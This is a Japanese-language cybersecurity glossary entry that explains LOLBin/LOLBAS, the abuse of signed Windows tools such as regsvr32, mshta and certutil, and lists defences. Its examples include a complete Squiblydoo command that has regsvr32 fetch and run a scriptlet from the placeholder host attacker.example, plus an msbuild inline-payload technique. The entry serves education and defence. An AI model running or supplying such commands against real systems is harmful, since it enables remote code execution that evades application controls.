LOLBin / LOLBAS
LOLBin / LOLBAS とは何ですか?
LOLBin / LOLBAS正規の管理ツールを装いつつ、実行・ダウンロード・永続化・回避に悪用される署名済みの標準バイナリ/スクリプト(LOLBin/LOLBAS)。
LOLBin(Living-Off-the-Land Binary)および、より広範な LOLBAS(Living-Off-the-Land Binaries And Scripts)プロジェクトは、攻撃に有用な副作用(任意コード実行、リモートペイロードのダウンロード、アプリ制御の回避など)を持つ Microsoft 署名済みのバイナリ、スクリプト、ライブラリを整理したカタログです。代表例には rundll32.exe、regsvr32.exe、mshta.exe、msbuild.exe、installutil.exe、certutil.exe などがあります。各ツールは署名され信頼されているため、ハッシュベースのブロックは効果が薄く、防御側は「正常」と「異常」のコマンドラインを区別する必要があります。LOLBAS は MITRE ATT&CK の実行・防御回避の多数のテクニックの基盤となっています。対策には、アプリケーションのアロウリスト、ScriptBlock とプロセス生成のロギング、ASR ルール、EDR のふるまい分析があります。
● 例
- 01
regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll(Squiblydoo)。
- 02
msbuild.exe payload.xml により、EXE を落とさずインライン C# を実行する。
● よくある質問
LOLBin / LOLBAS とは何ですか?
正規の管理ツールを装いつつ、実行・ダウンロード・永続化・回避に悪用される署名済みの標準バイナリ/スクリプト(LOLBin/LOLBAS)。 サイバーセキュリティの 攻撃と脅威 カテゴリに属します。
LOLBin / LOLBAS とはどういう意味ですか?
正規の管理ツールを装いつつ、実行・ダウンロード・永続化・回避に悪用される署名済みの標準バイナリ/スクリプト(LOLBin/LOLBAS)。
LOLBin / LOLBAS はどのように機能しますか?
LOLBin(Living-Off-the-Land Binary)および、より広範な LOLBAS(Living-Off-the-Land Binaries And Scripts)プロジェクトは、攻撃に有用な副作用(任意コード実行、リモートペイロードのダウンロード、アプリ制御の回避など)を持つ Microsoft 署名済みのバイナリ、スクリプト、ライブラリを整理したカタログです。代表例には rundll32.exe、regsvr32.exe、mshta.exe、msbuild.exe、installutil.exe、certutil.exe などがあります。各ツールは署名され信頼されているため、ハッシュベースのブロックは効果が薄く、防御側は「正常」と「異常」のコマンドラインを区別する必要があります。LOLBAS は MITRE ATT&CK の実行・防御回避の多数のテクニックの基盤となっています。対策には、アプリケーションのアロウリスト、ScriptBlock とプロセス生成のロギング、ASR ルール、EDR のふるまい分析があります。
LOLBin / LOLBAS からどのように防御しますか?
LOLBin / LOLBAS に対する防御は通常、上記の定義で述べたとおり、技術的統制と運用上の実践を組み合わせます。
LOLBin / LOLBAS の別名は何ですか?
一般的な別名: LOLBAS, Living-off-the-Land バイナリ。
● 関連用語
- attacks№ 616
Living off the Land
独自マルウェアを投下せず、被害ホストにすでに存在する正規ツールやスクリプトを悪用する攻撃スタイル。
- malware№ 417
ファイルレスマルウェア
ディスク上の従来型実行ファイルを使わず、主にメモリ上で動作して正規のシステムツールを悪用するマルウェア。
- defense-ops№ 298
防御回避(Defense Evasion)
検知を回避し、セキュリティ製品を無効化し、活動を隠すために攻撃者が用いる手法をまとめた MITRE ATT&CK 戦術(TA0005)。
- defense-ops№ 371
EDR(エンドポイント検知・対応)
プロセス・ファイル・レジストリ・ネットワーク活動を継続的に記録し、エンドポイント上の脅威を検知・調査・対応するエンドポイントセキュリティ技術。
- defense-ops№ 682
Mimikatz
メモリーや LSASS から平文パスワード、ハッシュ、Kerberos チケットなどの認証情報を抽出する、オープンソースの Windows 用ポストエクスプロイト ツール。
- attacks№ 045
AMSI バイパス
Windows の AMSI(アンチマルウェアスキャンインターフェイス)を無効化・パッチ・回避し、スクリプトやインメモリ・ペイロードがウイルス対策にスキャンされないようにする一連の手法。